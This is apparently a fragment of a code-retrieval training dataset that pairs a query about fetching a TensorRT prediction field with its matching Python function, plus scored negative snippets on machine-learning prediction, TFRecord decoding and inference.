holohess=holohess)\n return ovhdcrn", "def BraggEnergy(ID,hkl,twotheta):\n ID=goodID(ID)\n d=dSpace(ID,hkl)\n l=2*d*sind(twotheta/2.0)\n E=lam2E(l)\n return E", "def _calc_energy( self, V_a, eos_d ):\n pass", "def energy(self):\n self.E = - np.sum(self.phi) + 0.5 * self.mass * np.sqrt((self.v_x ** 2 + self.v_y **2))", "def k1(self) -> float:\n return self.distortion_coefficients[0]", "def fit_full(self, K, epsilon=1e-3,power_ep=[1.,1.]):\r\n self.epsilon = epsilon\r\n self.eta, self.delta = power_ep\r\n\r\n #Initial values - Posterior distribution parameters: q(f|X,Y) = N(f|mu,Sigma)\r\n mu = np.zeros(self.num_data)\r\n Sigma = K.copy()\r\n\r\n \"\"\"\r\n Initial values - Cavity distribution parameters:\r\n q_(f|mu_,sigma2_) = Product{q_i(f|mu_i,sigma2_i)}\r\n sigma_ = 1./tau_\r\n mu_ = v_/tau_\r\n \"\"\"\r\n self.tau_ = np.empty(self.num_data,dtype=float)\r\n self.v_ = np.empty(self.num_data,dtype=float)\r\n\r\n #Initial values - Marginal moments\r\n z = np.empty(self.num_data,dtype=float)\r\n self.Z_hat = np.empty(self.num_data,dtype=float)\r\n phi = np.empty(self.num_data,dtype=float)\r\n mu_hat = np.empty(self.num_data,dtype=float)\r\n sigma2_hat = np.empty(self.num_data,dtype=float)\r\n\r\n #Approximation\r\n epsilon_np1 = self.epsilon + 1.\r\n epsilon_np2 = self.epsilon + 1.\r\n \tself.iterations = 0\r\n self.np1 = [self.tau_tilde.copy()]\r\n self.np2 = [self.v_tilde.copy()]\r\n while epsilon_np1 > self.epsilon or epsilon_np2 > self.epsilon:\r\n update_order = np.random.permutation(self.num_data)\r\n for i in update_order:\r\n #Cavity distribution parameters\r\n self.tau_[i] = 
1./Sigma[i,i] - self.eta*self.tau_tilde[i]\r\n self.v_[i] = mu[i]/Sigma[i,i] - self.eta*self.v_tilde[i]\r\n #Marginal moments\r\n self.Z_hat[i], mu_hat[i], sigma2_hat[i] = self.noise_model.moments_match(self.data[i],self.tau_[i],self.v_[i])\r\n #Site parameters update\r\n Delta_tau = self.delta/self.eta*(1./sigma2_hat[i] - 1./Sigma[i,i])\r\n Delta_v = self.delta/self.eta*(mu_hat[i]/sigma2_hat[i] - mu[i]/Sigma[i,i])\r\n self.tau_tilde[i] += Delta_tau\r\n self.v_tilde[i] += Delta_v\r\n #Posterior distribution parameters update\r\n DSYR(Sigma,Sigma[:,i].copy(), -float(Delta_tau/(1.+ Delta_tau*Sigma[i,i])))\r\n mu = np.dot(Sigma,self.v_tilde)\r\n self.iterations += 1\r\n #Sigma recomptutation with Cholesky decompositon\r\n Sroot_tilde_K = np.sqrt(self.tau_tilde)[:,None]*K\r\n B = np.eye(self.num_data) + np.sqrt(self.tau_tilde)[None,:]*Sroot_tilde_K\r\n L = jitchol(B)\r\n V,info = dtrtrs(L,Sroot_tilde_K,lower=1)\r\n Sigma = K - np.dot(V.T,V)\r\n mu = np.dot(Sigma,self.v_tilde)\r\n epsilon_np1 = sum((self.tau_tilde-self.np1[-1])**2)/self.num_data\r\n epsilon_np2 = sum((self.v_tilde-self.np2[-1])**2)/self.num_data\r\n self.np1.append(self.tau_tilde.copy())\r\n self.np2.append(self.v_tilde.copy())\r\n\r\n return self._compute_GP_variables()", "def getEnergy(self):\n if not hasattr(self,\"energy\"):\n self.energy = self.calcEnergy()\n return self.energy" ]
[ "0.685864", "0.6753086", "0.66774917", "0.65416646", "0.64236945", "0.6406966", "0.6316658", "0.6298241", "0.6277267", "0.6244753", "0.62259036", "0.62029636", "0.61880386", "0.61798847", "0.6175505", "0.6172549", "0.6145199", "0.6102385", "0.6071389", "0.6060328", "0.6001661", "0.59687155", "0.59663796", "0.5964864", "0.5964864", "0.59619546", "0.5959173", "0.59552604", "0.5945635", "0.5900157", "0.58997095", "0.58884645", "0.58877724", "0.58876985", "0.58820033", "0.5867749", "0.5867373", "0.58642876", "0.5861941", "0.5853756", "0.5851462", "0.5844948", "0.58418965", "0.58386004", "0.5835454", "0.5834334", "0.5833078", "0.5829652", "0.5827671", "0.58030057", "0.5801439", "0.5801428", "0.57974946", "0.5796232", "0.5785133", "0.5767913", "0.57672346", "0.57490575", "0.57480866", "0.5745102", "0.57449925", "0.57438725", "0.5741803", "0.57416666", "0.5738659", "0.5730399", "0.5729311", "0.57264864", "0.5725891", "0.5725142", "0.569503", "0.5690015", "0.5686154", "0.56855226", "0.5670784", "0.56707084", "0.5665631", "0.56497127", "0.56412333", "0.56382626", "0.5636753", "0.56367004", "0.56324685", "0.56287897", "0.56259525", "0.56256247", "0.5616365", "0.56149375", "0.56080073", "0.5606281", "0.560437", "0.5601512", "0.5587399", "0.5577109", "0.55738956", "0.55720633", "0.5570471", "0.5568524", "0.55626845", "0.55615574" ]
0.6054048
20
Fetches prediction field from prediction byte array. After TensorRT inference, prediction data is saved in byte array and returned by object detection network. This byte array contains several pieces of data about prediction we call one such piece a prediction field. The prediction fields layout is described in TRT_PREDICTION_LAYOUT. This function, given prediction byte array returned by network, staring index of given prediction and field name of interest, returns prediction field data corresponding to given arguments.
def fetch_prediction_field(field_name, detection_out, pred_start_idx): return detection_out[pred_start_idx + TRT_PREDICTION_LAYOUT[field_name]]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def load_predict(path=MODEL_PATH, version=VERSION, namePredictor=DEFAULT_PREDICTOR):\n logging.info(\"trying to load {}\".format(path + namePredictor + version + '.npz'))\n return np.load(path + namePredictor + version + '.npz')['pred']", "async def predict(params: predict_text):\n tweet = params.text\n prediction = tf_model.predict(tweet)\n prediction_db = PredictionModel(\n text=tweet,\n label=prediction[\"label\"],\n score=prediction[\"score\"],\n time=prediction[\"elapsed_time\"],\n )\n db.session.add(prediction_db)\n db.session.commit()\n return prediction", "def predict_raw(data_gen, index, partition, model):\n\n if partition == 'validation':\n transcr = data_gen.texts_valid[index]\n audio_path = \"\"\n data_point=data_gen.features_valid[index].T\n elif partition == 'train':\n transcr = data_gen.texts[index]\n # audio_path = data_gen.train_audio_paths[index]\n # data_point = data_gen.normalize(data_gen.featurize(audio_path))\n audio_path=\"\"\n data_point=data_gen.features[index].T\n else:\n raise Exception('Invalid partition! Must be \"train\" or \"validation\"')\n \n prediction = model.predict(np.expand_dims(data_point, axis=0))\n return (audio_path,data_point,transcr,prediction)", "def get_fvlm_predict_fn(serving_batch_size):\n num_classes, text_dim = load_fvlm_gin_configs()\n predict_step = create_predict_step()\n anchor_boxes, image_info = generate_anchors_info()\n\n def predict_fn(params, input_dict):\n input_dict['labels'] = {\n 'detection': {\n 'anchor_boxes': anchor_boxes,\n 'image_info': image_info,\n }\n }\n output = predict_step(params, input_dict, jax.random.PRNGKey(0))\n output = output['detection']\n output.pop('rpn_score_outputs')\n output.pop('rpn_box_outputs')\n output.pop('class_outputs')\n output.pop('box_outputs')\n return output\n\n input_signatures = {\n 'image':\n tf.TensorSpec(\n shape=(serving_batch_size, _IMAGE_SIZE.value, _IMAGE_SIZE.value,\n 3),\n dtype=tf.bfloat16,\n name='image'),\n 'text':\n tf.TensorSpec(\n shape=(serving_batch_size, num_classes, text_dim),\n dtype=tf.float32,\n name='queries'),\n }\n return predict_fn, input_signatures", "def predict(predictor, inputs):\n predictor_type = type(predictor).__name__\n\n # Standard tensorflow predictor\n if predictor_type in [\"tf.estimator.predictor\", \"SavedModelPredictor\"]:\n return predictor(inputs)[\"top_k\"]\n\n # Python based endpoint\n elif predictor_type == \"sagemaker.tensorflow.model.TensorFlowPredictor\":\n prediction = predictor.predict(inputs)\n top_k = prediction[\"outputs\"][\"top_k\"]\n output_shape = [y[\"size\"] for y in top_k[\"tensor_shape\"][\"dim\"]]\n output_val = np.array(top_k[\"int_val\"]).reshape(*output_shape)\n return output_val\n\n # Tensorflow serving based endpoint\n elif predictor_type in [\"sagemaker.tensorflow.serving.Predictor\", \"Predictor\"]:\n prediction = predictor.predict(inputs)\n return np.array(prediction[\"predictions\"])\n else:\n print(\"Predict method failed. Supplied predictor type {} not supported.\".format(predictor_type))", "def predict(self):\n for src_p, pair in enumerate(self.pairs):\n dst_p = pair[1].argmax()\n dst_ind = pair[0][dst_p]\n\n self.vector_field.append(np.hstack([self.frame_0[src_p], self.frame_1[dst_ind]]))\n\n self.vector_field = np.vstack(self.vector_field)\n\n return self.vector_field", "def predict(self, testloader, field=None):\n model_name = str(field).lower()\n\n assert field == HOME or field == AWAY, 'ERROR - model predict: WRONG model name. 
Give \"home\" or \"away\"'\n\n preds = {}\n\n for i, model in enumerate(self.models):\n if (model_name == HOME):\n # logger.info('> Calling Home Network')\n field_net = model.model.home_network\n elif (model_name == AWAY):\n # logger.info('> Calling Away Network')\n field_net = model.model.away_network\n else:\n raise ValueError('Model - predict: Wrong model name')\n\n model_preds = []\n with torch.no_grad():\n\n for x in testloader:\n x = torch.Tensor(x).to(self.device)\n out = field_net(x)\n\n out = out.squeeze()\n\n model_preds.append(out.item())\n\n preds[i] = model_preds\n\n return preds[i]", "def predict(self, data, version='default'):\n return self.skil.api.transformarray(\n deployment_name=self.deployment.name,\n transform_name=self.model_name,\n version_name=version,\n batch_record=data\n )", "def predict(self, image_or_filename: Union[np.ndarray, str]) -> Tuple[str, float]:\n if isinstance(image_or_filename, str):\n image = util.load_image(image_or_filename)\n else:\n image = image_or_filename\n return self.model.predict(image, batch_size=8)\n # return self.model.predict_on_image(image)", "def predict(self, trained_model, prediction_datetime):\n return trained_model.predict()", "def _deserialize_single_field(\n example_data, tensor_info: feature_lib.TensorInfo\n):\n # Ragged tensor case:\n if tensor_info.sequence_rank > 1:\n example_data = _dict_to_ragged(example_data, tensor_info)\n\n # Restore shape if possible. TF Example flattened it.\n elif tensor_info.shape.count(None) < 2:\n shape = [-1 if i is None else i for i in tensor_info.shape]\n example_data = tf.reshape(example_data, shape)\n\n # Restore dtype\n if example_data.dtype != tensor_info.tf_dtype:\n example_data = tf.dtypes.cast(example_data, tensor_info.tf_dtype)\n return example_data", "def predict(net, input, fields):\n net.eval()\n example = torch_data.Example.fromlist(input, fields)\n dataset = torch_data.Dataset([example])\n iterator = torch_data.Iterator(dataset, batch_size=1)\n net_in = next(iter(iterator))\n return predict_batch(net, net_in)", "def predict_from_model(patch, model):\n\n prediction = model.predict(patch.reshape(1, 256, 256, 3))\n prediction = prediction[:, :, :, 1].reshape(256, 256)\n return prediction", "def predict(self, data):\n\n prediction = None\n if self.model is not None:\n prediction = self.model.predict(data)\n return prediction", "def decode_prediction(self, prediction):\n index = np.argmax(prediction)\n\n inv_map = {v: k for k, v in self.class_index.items()}\n label = inv_map[index]\n return label, np.amax(prediction)", "def load_predict_byname(filename, path=MODEL_PATH):\n full_path = os.path.join(path, filename)\n logging.info(\"trying to load {}\".format(full_path))\n return np.load(os.path.join(path, filename))['pred']", "def extract_pred_from_estimator_predictions(predictions):\n # print('predictions:', predictions)\n pred = np.array([])\n for prediction in predictions:\n pred = np.append(pred, prediction['predictions'])\n num_samples = len(pred)\n pred = pred.reshape((num_samples, ))\n return pred", "def tta_predict(learner, im_arr):\n # Note: we are not using the TTA method built into fastai because it only\n # works on image classification problems (and this is undocumented).\n # We should consider contributing this upstream to fastai.\n probs = []\n for k in range(8):\n trans_im = dihedral(Image(im_arr), k)\n o = learner.predict(trans_im)[2]\n # https://forums.fast.ai/t/how-best-to-have-get-preds-or-tta-apply-specified-transforms/40731/9\n o = Image(o)\n if k == 5:\n o = 
dihedral(o, 6)\n elif k == 6:\n o = dihedral(o, 5)\n else:\n o = dihedral(o, k)\n probs.append(o.data)\n\n label_arr = torch.stack(probs).mean(0).argmax(0).numpy()\n return label_arr", "def prediction(self, x):\n t = self.model.predict(x.reshape(1, -1))\n return t", "def _extract_prediction_tensors(model,\n create_input_dict_fn,\n ignore_groundtruth=False):\n input_dict = create_input_dict_fn()\n prefetch_queue = prefetcher.prefetch(input_dict, capacity=500)\n input_dict = prefetch_queue.dequeue()\n original_image = tf.expand_dims(input_dict[fields.InputDataFields.image], 0)\n preprocessed_image = model.preprocess(tf.to_float(original_image))\n prediction_dict = model.predict(preprocessed_image)\n detections = model.postprocess(prediction_dict)\n\n groundtruth = None\n if not ignore_groundtruth:\n groundtruth = {\n fields.InputDataFields.groundtruth_boxes:\n input_dict[fields.InputDataFields.groundtruth_boxes],\n fields.InputDataFields.groundtruth_classes:\n input_dict[fields.InputDataFields.groundtruth_classes],\n fields.InputDataFields.groundtruth_area:\n input_dict[fields.InputDataFields.groundtruth_area],\n fields.InputDataFields.groundtruth_is_crowd:\n input_dict[fields.InputDataFields.groundtruth_is_crowd],\n fields.InputDataFields.groundtruth_difficult:\n input_dict[fields.InputDataFields.groundtruth_difficult]\n }\n if fields.InputDataFields.groundtruth_group_of in input_dict:\n groundtruth[fields.InputDataFields.groundtruth_group_of] = (\n input_dict[fields.InputDataFields.groundtruth_group_of])\n if fields.DetectionResultFields.detection_masks in detections:\n groundtruth[fields.InputDataFields.groundtruth_instance_masks] = (\n input_dict[fields.InputDataFields.groundtruth_instance_masks])\n\n return eval_util.result_dict_for_single_example(\n original_image,\n input_dict[fields.InputDataFields.source_id],\n detections,\n groundtruth,\n class_agnostic=(\n fields.DetectionResultFields.detection_classes not in detections),\n scale_to_absolute=True)", "def predict(request):\n request_json = request.get_json()\n if request_json and 'review_body' in request_json:\n content = request_json['review_body'] # TODO add review_summary\n prediction = get_prediction(\n content, 'projects/207895552307/locations/us-central1/models/TCN5004391989450375168')\n classifications = []\n return MessageToJson(prediction)\n else:\n return f'ERROR: Missing review_body!'", "def predict(self, compound, spacegroup, T):\n\n prediction = self.model.predict(self._transform_input(compound,\n spacegroup, T))\n return float(prediction)", "def predict(self):\n path = self._artifact_repo.artifact_path(self._ARTIFACT_MODEL)\n model = tf.keras.models.load_model(path)\n\n _, _, x_test, y_test = self._load_data()\n x_test = tf.keras.utils.normalize(x_test, axis=1)\n\n preds = model.predict(x_test)\n self._show_cf_matrix(np.array([np.argmax(probas) for probas in preds]), y_test)", "def _get_prediction(self):\n raise NotImplementedError", "def read(self, field_name):\n field = self.mem_map.get_field(field_name)\n raw_data = self.reader(field.get_offset(), field.get_size())\n if raw_data:\n deps = field.get_deps()\n decoded_deps = {dep: self.read(dep) for dep in deps}\n return field.decode(raw_data, **decoded_deps)\n return None", "def get_field_from_dict(example_dict, field_name, height_m_agl=None):\n\n check_field_name(field_name)\n\n if field_name in ALL_SCALAR_PREDICTOR_NAMES:\n height_m_agl = None\n field_index = example_dict[SCALAR_PREDICTOR_NAMES_KEY].index(field_name)\n data_matrix = 
example_dict[SCALAR_PREDICTOR_VALS_KEY][..., field_index]\n elif field_name in ALL_SCALAR_TARGET_NAMES:\n height_m_agl = None\n field_index = example_dict[SCALAR_TARGET_NAMES_KEY].index(field_name)\n data_matrix = example_dict[SCALAR_TARGET_VALS_KEY][..., field_index]\n elif field_name in ALL_VECTOR_PREDICTOR_NAMES:\n field_index = example_dict[VECTOR_PREDICTOR_NAMES_KEY].index(field_name)\n data_matrix = example_dict[VECTOR_PREDICTOR_VALS_KEY][..., field_index]\n else:\n field_index = example_dict[VECTOR_TARGET_NAMES_KEY].index(field_name)\n data_matrix = example_dict[VECTOR_TARGET_VALS_KEY][..., field_index]\n\n if height_m_agl is None:\n return data_matrix\n\n height_index = match_heights(\n heights_m_agl=example_dict[HEIGHTS_KEY],\n desired_height_m_agl=height_m_agl\n )\n\n return data_matrix[..., height_index]", "def get_aux_fields(prediction_dict, example_dict):\n\n scalar_target_matrix = prediction_dict[prediction_io.SCALAR_TARGETS_KEY]\n scalar_prediction_matrix = (\n prediction_dict[prediction_io.SCALAR_PREDICTIONS_KEY]\n )\n\n num_examples = scalar_prediction_matrix.shape[0]\n num_ensemble_members = scalar_prediction_matrix.shape[-1]\n\n aux_target_matrix = numpy.full((num_examples, 0), numpy.nan)\n aux_prediction_matrix = numpy.full(\n (num_examples, 0, num_ensemble_members), numpy.nan\n )\n aux_target_field_names = []\n aux_predicted_field_names = []\n\n shortwave_surface_down_flux_index = -1\n shortwave_toa_up_flux_index = -1\n longwave_surface_down_flux_index = -1\n longwave_toa_up_flux_index = -1\n\n scalar_target_names = example_dict[example_utils.SCALAR_TARGET_NAMES_KEY]\n these_flux_names = [\n example_utils.SHORTWAVE_SURFACE_DOWN_FLUX_NAME,\n example_utils.SHORTWAVE_TOA_UP_FLUX_NAME\n ]\n\n if all([n in scalar_target_names for n in these_flux_names]):\n shortwave_surface_down_flux_index = scalar_target_names.index(\n example_utils.SHORTWAVE_SURFACE_DOWN_FLUX_NAME\n )\n shortwave_toa_up_flux_index = scalar_target_names.index(\n example_utils.SHORTWAVE_TOA_UP_FLUX_NAME\n )\n\n aux_target_field_names.append(SHORTWAVE_NET_FLUX_NAME)\n aux_predicted_field_names.append(SHORTWAVE_NET_FLUX_NAME)\n\n this_target_matrix = (\n scalar_target_matrix[:, [shortwave_surface_down_flux_index]] -\n scalar_target_matrix[:, [shortwave_toa_up_flux_index]]\n )\n aux_target_matrix = numpy.concatenate(\n (aux_target_matrix, this_target_matrix), axis=1\n )\n\n this_prediction_matrix = (\n scalar_prediction_matrix[:, [shortwave_surface_down_flux_index], :]\n - scalar_prediction_matrix[:, [shortwave_toa_up_flux_index], :]\n )\n aux_prediction_matrix = numpy.concatenate(\n (aux_prediction_matrix, this_prediction_matrix), axis=1\n )\n\n these_flux_names = [\n example_utils.LONGWAVE_SURFACE_DOWN_FLUX_NAME,\n example_utils.LONGWAVE_TOA_UP_FLUX_NAME\n ]\n\n if all([n in scalar_target_names for n in these_flux_names]):\n longwave_surface_down_flux_index = scalar_target_names.index(\n example_utils.LONGWAVE_SURFACE_DOWN_FLUX_NAME\n )\n longwave_toa_up_flux_index = scalar_target_names.index(\n example_utils.LONGWAVE_TOA_UP_FLUX_NAME\n )\n\n aux_target_field_names.append(LONGWAVE_NET_FLUX_NAME)\n aux_predicted_field_names.append(LONGWAVE_NET_FLUX_NAME)\n\n this_target_matrix = (\n scalar_target_matrix[:, [longwave_surface_down_flux_index]] -\n scalar_target_matrix[:, [longwave_toa_up_flux_index]]\n )\n aux_target_matrix = numpy.concatenate(\n (aux_target_matrix, this_target_matrix), axis=1\n )\n\n this_prediction_matrix = (\n scalar_prediction_matrix[:, [longwave_surface_down_flux_index], :] -\n 
scalar_prediction_matrix[:, [longwave_toa_up_flux_index], :]\n )\n aux_prediction_matrix = numpy.concatenate(\n (aux_prediction_matrix, this_prediction_matrix), axis=1\n )\n\n return {\n AUX_TARGET_NAMES_KEY: aux_target_field_names,\n AUX_PREDICTED_NAMES_KEY: aux_predicted_field_names,\n AUX_TARGET_VALS_KEY: aux_target_matrix,\n AUX_PREDICTED_VALS_KEY: aux_prediction_matrix,\n SHORTWAVE_SURFACE_DOWN_FLUX_INDEX_KEY:\n shortwave_surface_down_flux_index,\n SHORTWAVE_TOA_UP_FLUX_INDEX_KEY: shortwave_toa_up_flux_index,\n LONGWAVE_SURFACE_DOWN_FLUX_INDEX_KEY: longwave_surface_down_flux_index,\n LONGWAVE_TOA_UP_FLUX_INDEX_KEY: longwave_toa_up_flux_index\n }", "def make_tflite_inference(ndvi_img_array, model_interpreter):\n # Get input and output tensors.\n input_details = model_interpreter.get_input_details()\n output_details = model_interpreter.get_output_details()\n\n # Get Input shape\n input_shape = input_details[0]['shape']\n input_data = ndvi_img_array.reshape(input_shape)\n\n model_interpreter.set_tensor(input_details[0]['index'], input_data)\n model_interpreter.invoke()\n\n outputs = []\n\n for tensor in output_details:\n output_data = model_interpreter.get_tensor(tensor['index'])\n outputs.append(output_data[0][0])\n\n prediction = outputs[0]\n\n return prediction", "def predict_single(self, data, version='default'):\n return self.skil.api.transformincrementalarray(\n deployment_name=self.deployment.name,\n transform_name=self.model_name,\n version_name=version,\n single_record=data\n )", "def predict(self, dt=1):\n self.kf.predict()\n if self.time_since_update > 0: # there was missed detections\n self.continuing_hits = 0\n self.time_since_update += 1\n return self.kf.x[:self.dim_z].squeeze()", "def predict(self, data):\n\t\traise NotImplementedError", "def decode_tensorflow(self, encoded_chunks: tf.Tensor) -> tf.Tensor:", "def prediction(self, x):\n if len(x.shape)==1:\n x = np.reshape(x, (1, x.shape[0]))\n predict = self.model.predict(x)\n return predict", "def predict(self, img):\n return self._predict([img])[0]", "def predict(trained_model, X_test, y_test, image_name):\n if MODEL == 1:\n return predict_1(trained_model, X_test, y_test)\n elif MODEL == 3:\n if CROSS_VALIDATION:\n return cv_predict_3(trained_model, X_test, y_test)\n else:\n return predict_3(trained_model, X_test, y_test, image_name)\n elif MODEL == 2:\n return predict_2(trained_model, X_test, y_test)\n else:\n # For models 4, 5 and 6\n return predict_4(trained_model, X_test, y_test)", "def prediction(self, x):\n if len(x.shape)==1:\n x = np.reshape(x, (1, x.shape[0]))\n predict = self.model.predict(x)\n\n return predict", "def predict(self, data):\n return self.result.predict(data)", "def _decode_record(record, name_to_features):\n example = tf.parse_single_example(record, name_to_features)\n return example", "def get_prediction(\n image,\n detection_model,\n image_size: int = None,\n shift_amount: list = [0, 0],\n full_shape=None,\n postprocess: Optional[PostprocessPredictions] = None,\n verbose: int = 0,\n) -> PredictionResult:\n durations_in_seconds = dict()\n\n # read image as pil\n image_as_pil = read_image_as_pil(image)\n # get prediction\n time_start = time.time()\n detection_model.perform_inference(np.ascontiguousarray(image_as_pil), image_size=image_size)\n time_end = time.time() - time_start\n durations_in_seconds[\"prediction\"] = time_end\n\n # process prediction\n time_start = time.time()\n # works only with 1 batch\n detection_model.convert_original_predictions(\n shift_amount=shift_amount,\n 
full_shape=full_shape,\n )\n object_prediction_list: List[ObjectPrediction] = detection_model.object_prediction_list\n # filter out predictions with lower score\n filtered_object_prediction_list = [\n object_prediction\n for object_prediction in object_prediction_list\n if object_prediction.score.value > detection_model.confidence_threshold\n ]\n # postprocess matching predictions\n if postprocess is not None:\n filtered_object_prediction_list = postprocess(filtered_object_prediction_list)\n else:\n # init match merge instances\n postprocess = UnionMergePostprocess(match_threshold=0.9, match_metric=\"IOS\", class_agnostic=True)\n # postprocess matching predictions\n filtered_object_prediction_list = postprocess(filtered_object_prediction_list)\n\n time_end = time.time() - time_start\n durations_in_seconds[\"postprocess\"] = time_end\n\n if verbose == 1:\n print(\n \"Prediction performed in\",\n durations_in_seconds[\"prediction\"],\n \"seconds.\",\n )\n\n return PredictionResult(\n image=image, object_prediction_list=filtered_object_prediction_list, durations_in_seconds=durations_in_seconds\n )", "def _decode_record(record, name_to_features):\n example = tf.parse_single_example(record, name_to_features)\n\n # tf.Example only supports tf.int64, but the TPU only supports tf.int32.\n # So cast all int64 to int32.\n for name in list(example.keys()):\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.to_int32(t)\n example[name] = t\n\n return example", "def _decode_record(record, name_to_features):\n example = tf.parse_single_example(record, name_to_features)\n\n # tf.Example only supports tf.int64, but the TPU only supports tf.int32.\n # So cast all int64 to int32.\n for name in list(example.keys()):\n print(name)\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.to_int32(t)\n example[name] = t\n\n return example", "def predict(self, datafile):", "def _decode_record(record, name_to_features):\n example = tf.parse_single_example(record, name_to_features)\n\n # tf.Example only supports tf.int64, but the TPU only supports tf.int32.\n # So cast all int64 to int32.\n for name in list(example.keys()):\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.to_int32(t)\n example[name] = t\n\n return example", "def _decode_record(record,name_to_features):\n example = tf.parse_single_example(record,name_to_features)\n\n return example", "def predict():\n\tif request.method == \"POST\":\n\t\ttry:\n\t\t\t# read uplaoded audio file as bytes\n\t\t\tfile = request.files['file'].read()\n\t\t\t# get the audio signal as numpy array\n\t\t\tsignal = speech_recognizer.read_raw_audio(file)\n\t\t\t# convert audio isgnal to spectrogram using speech featurizer and expand tensor at 0th dimension\n\t\t\tsignal = speech_recognizer.model.speech_featurizer.tf_extract(tf.convert_to_tensor(signal, dtype=tf.float32))\n\t\t\tsignal = tf.expand_dims(signal, axis=0)\n\t\t\t# recognize for text sequence using greedy decoding\n\t\t\tpred = speech_recognizer.model.recognize(features=signal)\n\t\t\t# convert sequence to tamil unicode data\n\t\t\tpred = speech_recognizer.bytes_to_string(pred.numpy())[0]\n\t\t\t# retun the prediction to the user\n\t\t\treturn pred\n except Exception as e:\n\t\t\tprint(e)\n\t\t\tpass\n\telse:\n\t\treturn \"Error 404. 
Page Not Found!\"\n\nif __name__==\"__main__\":\n\tapp.run(host='0.0.0.0', port=5000, threaded=True, debug=True)", "def predict(self, review):\n raise NotImplementedError", "def predict(self, data, version='default'):\n if self.transform_service:\n data = self.transform_service.predict(data, version)\n return self.model_service.predict(data, version)", "def predict(self, data, only_lp=True):\n df = self.model.transpose(data)\n if only_lp:\n df = df.select(self.label_index_name, self.prediction_name, self.probability)\n return df", "def _read_and_decode(example_proto,data_shape,dtypes):\n features = {}\n for name in data_shape:\n features[name] = tf.FixedLenFeature([], tf.string)\n parsed_features = tf.parse_single_example(example_proto, features)\n count = 0\n res = {}\n for name in data_shape:\n res[name] = parsed_features[name]\n if dtypes[count]!=str:\n res[name]=tf.decode_raw(res[name],dtypes[count])\n if dtypes[count]==tf.float32 or dtypes[count]==tf.float64:\n res[name]=tf.convert_to_tensor(res[name],dtype=dtypes[count])\n if data_shape[name]:\n res[name]=tf.reshape(res[name],shape=data_shape[name])\n count += 1\n return res", "def _decode_record(record, name_to_features):\n\t\t\texample = tf.parse_single_example(record, name_to_features)\n\n\t\t\t# tf.Example only supports tf.int64, but the TPU only supports tf.int32.\n\t\t\t# So cast all int64 to int32.\n\t\t\tfor name in list(example.keys()):\n\t\t\t\tt = example[name]\n\t\t\t\tif t.dtype == tf.int64:\n\t\t\t\t\tt = tf.to_int32(t)\n\t\t\t\texample[name] = t\n\n\t\t\treturn example", "def predict(self, data_X):\n a, r = self.particle_input.feed_forward(data_X)\n for layer in self.layers:\n a, r = layer.feed_forward(a, r)\n return a", "def _decode_record(record, name_to_features):\n example = tf.parse_single_example(record, name_to_features)\n\n # tf.Example only supports tf.int64, but the TPU only supports tf.int32.\n # So cast all int64 to int32.\n for name in list(example.keys()):\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.to_int32(t)\n example[name] = t\n\n return example", "def _decode_record(record, name_to_features):\n example = tf.parse_single_example(record, name_to_features)\n\n # tf.Example only supports tf.int64, but the TPU only supports tf.int32.\n # So cast all int64 to int32.\n for name in list(example.keys()):\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.to_int32(t)\n example[name] = t\n\n return example", "def _decode_record(record, name_to_features):\n example = tf.parse_single_example(record, name_to_features)\n\n # tf.Example only supports tf.int64, but the TPU only supports tf.int32.\n # So cast all int64 to int32.\n for name in list(example.keys()):\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.to_int32(t)\n example[name] = t\n\n return example", "def _unpredict(self, arr: np.ndarray) -> None:\n if self.Predictor.value == 2:\n imagecodecs.delta_decode(arr, out=arr, axis=-1)", "def _decode_record(record, name_to_features):\n example = tf.io.parse_single_example(serialized=record, features=name_to_features)\n\n # tf.Example only supports tf.int64, but the TPU only supports tf.int32.\n # So cast all int64 to int32.\n for name in list(example.keys()):\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.cast(t, dtype=tf.int32)\n example[name] = t\n\n return example", "def _decode_record(record, name_to_features):\n example = tf.parse_single_example(record, name_to_features)\n\n # tf.Example only supports tf.int64, but the TPU only supports tf.int32.\n # So cast all int64 to 
int32.\n for name in list(example.keys()):\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.to_int32(t)\n example[name] = t\n\n return example", "def predict():\n\n\n json_payload = request.json\n #LOG.info(f\"JSON payload: %s\" %json_payload)\n inference_payload = pd.DataFrame(json_payload)\n #LOG.info(\"inference payload DataFrame: %s\" %inference_payload)\n scaled_payload = scale(inference_payload)\n prediction = list(clf.predict(scaled_payload))\n return jsonify({'prediction': prediction})", "def predict(prediction_request):\n\n feature_type = prediction_request['feature_type']\n\n if feature_type not in [MFCC, C_CENS, C_CQT, C_STFT, MEL]:\n raise Exception('Invalid Feature type for prediction: {}'.format(feature_type))\n\n model = model_from_feature[feature_type]\n\n prediction = np.argmax(model.predict([np.reshape(prediction_request['content'], (1, *prediction_request['content'].shape, 1))]), axis=1)[0]\n\n predicted_class = \"COPD\" if prediction == 0 else \"non-COPD\"\n\n print(\"Prediction for type {} = {}\".format(feature_type, predicted_class))\n\n socket.send_pyobj({\n 'model': feature_type,\n 'class': predicted_class\n })", "def predict(self, data):\n\t\tres = self.neuralNetworks.inference(self.dataCenter.process_inference_data(data))\n\t\tprint(res)", "def _get_data_protobuf(self, filename):\n filename_queue = tf.train.string_input_producer([str(filename)],\n num_epochs=None)\n reader = tf.TFRecordReader()\n _, serialized_example = reader.read(filename_queue)\n features = self._get_features(serialized_example)\n\n # image\n with tf.name_scope(\"deserialise_image\"):\n image, image_height, image_width = self._image_from_features(features)\n\n # ground truth landmarks\n with tf.name_scope(\"deserialise_landmarks\"):\n gt_heatmaps, gt_lms, n_landmarks, visible, marked = self._heatmaps_from_features(features)\n\n # information\n with tf.name_scope(\"deserialise_info\"):\n scale = self._info_from_features(features)\n\n # augmentation\n with tf.name_scope(\"image_augmentation\"):\n if self.augmentation:\n gt_heatmaps, gt_lms, image, image_height, image_width = project.input.augmentation.augmentation(\n gt_heatmaps, gt_lms, image, image_height, image_width,\n max_scale=1.25, min_scale=0.75,\n max_rotate=30., min_rotate=-30.,\n flip_probability=0.5, flip_fn=self.flip_fn)\n\n with tf.name_scope(\"crop\"):\n # crop to 256 * 256\n gt_heatmaps, gt_lms, image = self._crop(gt_heatmaps, gt_lms, image, image_height, image_width)\n\n 